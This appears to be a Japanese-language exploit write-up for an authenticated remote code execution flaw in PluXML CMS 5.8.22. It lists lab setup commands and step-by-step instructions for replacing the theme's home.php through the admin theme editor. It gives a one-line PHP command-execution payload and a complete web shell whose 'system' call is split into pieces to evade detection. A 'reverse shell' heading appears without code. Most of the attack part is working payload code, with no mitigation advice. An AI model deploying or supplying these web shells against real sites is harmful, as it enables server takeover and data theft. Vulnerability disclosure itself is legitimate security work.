
PluXML CMS バージョン 5.8.22 に深刻なリモートコード実行(RCE)の脆弱性が確認されました。この脆弱性により、認証済み管理者がテーマエディター機能を介して悪意のあるPHP Webシェルをアップロードし、Webサーバー上で任意のPHPコードを実行できる可能性があります。
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
段階的な悪用手順
認証: 有効な管理者資格情報を使用して PluXML 管理パネルにログインします テーマエディターに移動:
管理ダッシュボードにアクセスします
移動先: テーマ → Home.php → 編集

悪意のあるペイロードを注入:
home.php の既存のコンテンツを PHP ウェブシェルに置き換えます
ペイロード例: <?php system($_GET['cmd']); ?>
変更したファイルを保存します
実行をトリガー:
ウェブサイトのメインホームページにアクセスします 注入された PHP コードはウェブサーバーの権限で実行されます
リバースシェル
ウェブシェルのペイロード
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>